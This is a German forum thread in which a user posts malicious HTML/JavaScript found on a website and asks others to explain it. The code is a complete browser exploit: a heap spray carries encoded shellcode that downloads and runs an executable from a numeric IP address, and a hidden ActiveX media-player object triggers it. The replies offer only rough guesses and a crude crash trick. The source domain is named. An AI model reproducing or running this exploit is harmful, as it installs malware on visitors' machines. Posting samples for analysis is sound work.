habe hier einen bösartigen Code

M

Mitch

0
Hallo,

ich habe hier einen bösartigen Code und würde gerne wissen was der genau macht leider sind meine JS Kentnisse nicht so gut um ihn zu entschlüsseln. Kriegt das wer hin !!


<HTML>
<SCRIPT language="javascript">
food = unescape("%u9090%u9090%u10eb%u4b5b%uc933%ub966%u013c%u3480%u990b%ufae2%u05eb%uebe8%uffff%u70ff%u9934%u9999%u12c3%uaa6b%u3559%u01a4%u9999%uec99%u186f%u5175%u9999%u1299%u106d%ubdcf%u0c71%u9999%uaa99%u1042%u669f%uf1af%ud717%u7597%u3471%u9999%u1099%u91df%uf5f1%u99f5%uf199%uf7f6%ufdb7%uecf1%uf5eb%ucdf4%ucf66%u1091%u9ddf%uaf66%ue7f1%u7b41%u71ea%u9911%u9999%udf10%u6695%uf1af%u6701%u9713%ue071%u9999%u1099%u8ddf%uaf66%ubcf1%u6629%u715b%u99f3%u9999%udf10%u6681%u9def%uaff1%ub683%u71e9%u99c3%u9999%udf10%uf389%uf1fc%ub7ea%ue1fc%uff10%u6685%u85ef%ucf66%uaa81%uc850%u66c8%u85ef%uef66%uc8bd%ucf66%uaa89%uc850%uef66%u6685%u8dcf%ucf66%u7095%u9919%u9999%ucfcc%u38fd%u99a9%u9999%u591c%u95e1%ud912%u1295%u85e9%u1234%u91f1%u9072%ud912%u12ad%u2131%u9999%u1299%uc75c%u5bc4%u999d%uccca%ucecf%uf512%u81bd%udc12%u12a5%u9ccd%u9ae1%u124c%u81d3%uc312%u9ab9%u7a44%ud0ab%uad12%u9a12%uaa6c%u6566%u59aa%ua335%ued5d%u589e%u9456%u619a%u6b72%ue5a2%u8dbd%u78ec%uc312%u9abd%uff44%u9512%u12d2%u85c3%u449a%u9d12%u9a12%u725c%uaa9b%u1259%uc64c%uc4c7%u5bc2%u999d%u5071%u6667%u6866%u7474%u3a70%u2f2f%u3132%u2e39%u3331%u2e36%u3532%u2e32%u3331%u2f33%u696a%u6f61%u652e%u6578%u0098");
dish = unescape("%u0D0D%u0D0D");headersize = 20;
lobster = headersize+food.length
while (dish.length<lobster) dish+=dish;
shrimp = dish.substring(0, lobster);
raven = dish.substring(0, dish.length-lobster);
while(raven.length+lobster<0x40000) raven = raven+raven+shrimp;
cat = new Array();
i=0;while(++i<500){cat = raven + food;}
</SCRIPT>
<div style="display:none">
<object classid="clsid:cfcdaa03-8be4-11cf-b84b-0020afbbccfa" width="256" height="64">
<param name="_extentx" value="1">
<param name="_extenty" value="1">
<param name="autostart" value="1">
<param name="shuffle" value="0">
<param name="prefetch" value="0">
<param name="nolabels" value="0">
<param name="src" value="smile.smil">
<param name="controls" value="controlpanel,statusbar">
<param name="console" value="clip">
<param name="loop" value="1">
<param name="numloop">
<param name="center">
<param name="maintainaspect" value="0">
</object>
</div>
</HTML>
 
naja, mir tut der ja nix. Jedoch würde mich wirklich mal interessieren was dort genau passiert, mal sehen ob es wer hinkriegt.

Für den der es schafft spendier ich auch einen virtuellen Kaffeeeeeee !!

Wenn das mal kein Anreiz ist :) *gg*

thx for Help

Mitch
 
Sehe ich genauso, hab es durch meinen testrechner laufen lassen, und es ist wirklich absolut nichts passiert! ( wie auch mit javascript? )
 
Original von Shame
Sehe ich genauso, hab es durch meinen testrechner laufen lassen, und es ist wirklich absolut nichts passiert! ( wie auch mit javascript? )
Zum Vergrößern anklicken....
Naja mit Javascript kann man schon bisschen was anrichten. Für den IE reicht ja schon <img src="bullshit.jpg" width=99999999999999 height=999999999999>
probier mal ne html datei mit dem inhalt in IE zu öffnen :)
 
Naja mit Javascript kann man schon bisschen was anrichten. Für den IE reicht ja schon <img src="bullshit.jpg" width=99999999999999 height=999999999999>
Zum Vergrößern anklicken....

zum einen ist das doch HTML und zum andern ist dieser Bug meineswissens längst behoben. Hab ich mal irgendwo auf diesem Board gelesen.
Ich lass mich aber gern eines besseren belehren....
 
Diese Zahlenkombinationen ist ein ausführbarer Code,vermutlich eine umgewandelte Exe.
Das Script nutzt irgendeinen Exploit aus.

Mit Hilfe des Exploits wird der Code dann lokal auf dem System ausgeführt.

Zum Angst machen ist das sicher nicht. Wird schon funktionieren, sofern nicht gepacht.

Gruss

root
 
Original von ThiEfGaRReT
Naja mit Javascript kann man schon bisschen was anrichten. Für den IE reicht ja schon <img src="bullshit.jpg" width=99999999999999 height=999999999999>
Zum Vergrößern anklicken....

zum einen ist das doch HTML und zum andern ist dieser Bug meineswissens längst behoben. Hab ich mal irgendwo auf diesem Board gelesen.
Ich lass mich aber gern eines besseren belehren....
Zum Vergrößern anklicken....
html is ja noch nichma ein code. das sollte bloß zeigen, dass wenn html dazu in der lage ist schäden anzurichten, dann js erst recht weil du viel mehr möglichkeiten hast.
 
Weil der Code für Windows ist.
Weil ne Windows Exe nur unter Windows läuf. (Wenn es ne Exe ist; auf jeden Fall irgendein ausführbarer Code)
Weil Der Bug sehr wahrscheinlich für den IE ist.

Gruss

root
 
aber was macht der code genau

Hallo,

danke für die vielen Antworten der Code stammt von der Seite (nicht draufcklicken wer nicht drauf will) wortmann.de.3322.org und mich würde echt interessieren was der da macht er nutzt den Exploit vom IE aus aber er will ja irgendwas bezwecken Daten kopieren Programme installieren etc kommt man da nicht ran ????

Gruss

Mitch
 
lol hab ne seite mit dem cod geöfnet aber ist ihrgend wie nichts passiert bist sicher das der richtig geschrieben ist?
 
wenn ich drauf gehe springt mein Virenscanner an und erkennt den Exploit, den oben geposteten Code habe ich von dieser Seite !!!
 
@schwawawawalaflos : ich weiß net... vielleicht meinete erlinux :D X( :P


rechtschteibfehler--< nachwirkungen von gedtern abenfd
 
Um antworten zu können musst du eingeloggt sein.
Zurück
Oben